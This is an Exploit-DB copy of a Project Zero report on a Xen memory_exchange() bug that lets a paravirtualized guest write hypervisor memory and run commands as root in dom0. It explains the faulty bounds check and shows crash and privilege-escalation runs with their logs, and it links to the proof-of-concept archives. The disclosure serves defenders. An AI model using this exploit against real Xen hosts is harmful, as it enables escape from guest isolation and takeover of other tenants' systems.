Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout

EDB-ID:

41870




Platform:

Multiple

Date:

2017-04-11


Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184

This bug report describes a vulnerability in memory_exchange() that
permits PV guest kernels to write to an arbitrary virtual address with
hypervisor privileges. The vulnerability was introduced through a
broken fix for CVE-2012-5513 / XSA-29.

The fix for CVE-2012-5513 / XSA-29 introduced the following check in
the memory_exchange() hypercall handler:

    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
    {
        rc = -EFAULT;
        goto fail_early;
    }

guest_handle_okay() calls array_access_ok(), which calls access_ok(),
which is implemented as follows:

    /*
     * Valid if in +ve half of 48-bit address space, or above
     * Xen-reserved area.
     * This is also valid for range checks (addr, addr+size). As long
     * as the start address is outside the Xen-reserved area then we
     * will access a non-canonical address (and thus fault) before
     * ever reaching VIRT_START.
     */
    #define __addr_ok(addr) \
        (((unsigned long)(addr) < (1UL<<47)) || \
         ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

    #define access_ok(addr, size) \
        (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

As the comment states, access_ok() only checks the address, not the
size, if the address points to guest memory, based on the assumption
that any caller of access_ok() will access guest memory linearly,
starting at the supplied address. Callers that want to access a
subrange of the memory referenced by a guest handle are supposed to
use guest_handle_subrange_okay(), which takes an additional start
offset parameter, instead of guest_handle_okay().

memory_exchange() uses guest_handle_okay(), but only accesses the
guest memory arrays referenced by exch.in.extent_start and
exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset.
The intent behind exch.nr_exchanged is that guests always set it to 0
and nonzero values are only set when a hypercall has to be restarted
because of preemption, but this isn't enforced.

Therefore, by invoking this hypercall with crafted arguments, it is
possible to write to an arbitrary memory location that is encoded as

    exch.out.extent_start + 8 * exch.nr_exchanged

where exch.out.extent_start points to guest memory and
exch.nr_exchanged is an attacker-chosen 64-bit value.


I have attached a proof of concept. This PoC demonstrates the issue by
overwriting the first 8 bytes of the IDT entry for #PF, causing the
next pagefault to doublefault. To run the PoC, unpack it in a normal
64-bit PV domain and run the following commands in the domain as root:

root@pv-guest:~# cd crashpoc
root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd)
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
  LD      /root/crashpoc/built-in.o
  CC [M]  /root/crashpoc/module.o
nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm
  LD [M]  /root/crashpoc/test.o
  Building modules, stage 2.
  MODPOST 1 modules
WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o
  CC      /root/crashpoc/test.mod.o
  LD [M]  /root/crashpoc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/crashpoc# insmod test.ko
root@pv-guest:~/crashpoc# rmmod test

The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4
(from Ubuntu 16.04.2). Executing the PoC caused the following console
output:

(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.6.0  x86_64  debug=n  Tainted:    C ]----
(XEN) CPU:    0
(XEN) RIP:    e033:[<0000557b46f56860>] 0000557b46f56860
(XEN) RFLAGS: 0000000000010202   CONTEXT: hypervisor
(XEN) rax: 00007fffe9cfafd0   rbx: 00007fffe9cfd160   rcx: 0000557b47ebd040
(XEN) rdx: 0000000000000001   rsi: 0000000000000004   rdi: 0000557b47ec52e0
(XEN) rbp: 00007fffe9cfd158   rsp: 00007fffe9cfaf30   r8:  0000557b46f7df00
(XEN) r9:  0000557b46f7dec0   r10: 0000557b46f7df00   r11: 0000557b47ec5878
(XEN) r12: 0000557b47ebd040   r13: 00007fffe9cfb0c0   r14: 0000557b47ec52e0
(XEN) r15: 0000557b47ed5e70   cr0: 0000000080050033   cr4: 00000000001506a0
(XEN) cr3: 0000000098e2e000   cr2: 00007fffe9cfaf93
(XEN) ds: 0000   es: 0000   fs: 0000   gs: 0000   ss: e02b   cs: e033
(XEN) 
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN) 
(XEN) Reboot in five seconds...


I strongly recommend changing the semantics of access_ok() so that it
guarantees that any access to an address inside the specified range is
valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of
access_ok() and appropriate wrappers to prevent people from using
these functions improperly. Currently, in my opinion, the function
name access_ok() is misleading.

Proof of Concept: xen_memory_exchange_crashpoc.tar 

################################################################################

I have written an exploit (attached).

Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump):


root@pv-guest:~/privesc_poc# ./compile.sh 
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
  LD      /root/privesc_poc/built-in.o
  CC [M]  /root/privesc_poc/module.o
nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm
  LD [M]  /root/privesc_poc/test.o
  Building modules, stage 2.
  MODPOST 1 modules
WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o
  CC      /root/privesc_poc/test.mod.o
  LD [M]  /root/privesc_poc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest'                                                                                       
press enter to continue
<press enter>
root@pv-guest:~/privesc_poc#  


dmesg in the unprivileged PV guest:


[  721.413415] call_int_85 at 0xffffffffc0075a90
[  721.420167] backstop_85_handler at 0xffffffffc0075a93
[  722.801566] PML4 at ffff880002fe3000
[  722.808216] PML4 entry: 0x13bba4067
[  722.816161] ### trying to write crafted PUD entry...
[  722.824178] ### writing byte 0
[  722.832193] write_byte_hyper(ffff88007a491008, 0x7)
[  722.840254] write_byte_hyper successful
[  722.848234] ### writing byte 1
[  722.856170] write_byte_hyper(ffff88007a491009, 0x80)
[  722.864219] write_byte_hyper successful
[  722.872241] ### writing byte 2
[  722.880215] write_byte_hyper(ffff88007a49100a, 0x35)
[  722.889014] write_byte_hyper successful
[  722.896232] ### writing byte 3
[  722.904265] write_byte_hyper(ffff88007a49100b, 0x6)
[  722.912599] write_byte_hyper successful
[  722.920246] ### writing byte 4
[  722.928270] write_byte_hyper(ffff88007a49100c, 0x0)
[  722.938554] write_byte_hyper successful
[  722.944231] ### writing byte 5
[  722.952239] write_byte_hyper(ffff88007a49100d, 0x0)
[  722.961769] write_byte_hyper successful
[  722.968221] ### writing byte 6
[  722.976219] write_byte_hyper(ffff88007a49100e, 0x0)
[  722.984319] write_byte_hyper successful
[  722.992233] ### writing byte 7
[  723.000234] write_byte_hyper(ffff88007a49100f, 0x0)
[  723.008341] write_byte_hyper successful
[  723.016254] ### writing byte 8
[  723.024357] write_byte_hyper(ffff88007a491010, 0x0)
[  723.032254] write_byte_hyper successful
[  723.040236] ### crafted PUD entry written
[  723.048199] dummy
[  723.056199] going to link PMD into target PUD
[  723.064238] linked PMD into target PUD
[  723.072206] going to unlink mapping via userspace PUD
[  723.080230] mapping unlink done
[  723.088251] copying HV and user shellcode...
[  723.096283] copied HV and user shellcode
[  723.104270] int 0x85 returned 0x7331
[  723.112237]   remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800
[  723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800
[  723.128226] remapped IDT entry for 0x80 to 0xffff804000100800
[  723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15
[  723.144291] int 0x85 returned 0x1337
[  723.152235] === END ===


The supplied shell command executes in dom0 (and all other 64bit PV domains):


root@ubuntu:~# cat /tmp/owned_by_the_guest 
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# 


Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor.


I have tested the exploit in the following configurations:

configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu

configuration 2:
running on a physical machine with Qubes OS 3.1 installed
Xen version 4.6.3

Proof of Concept: privesc_poc.tar.gz 

################################################################################

Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip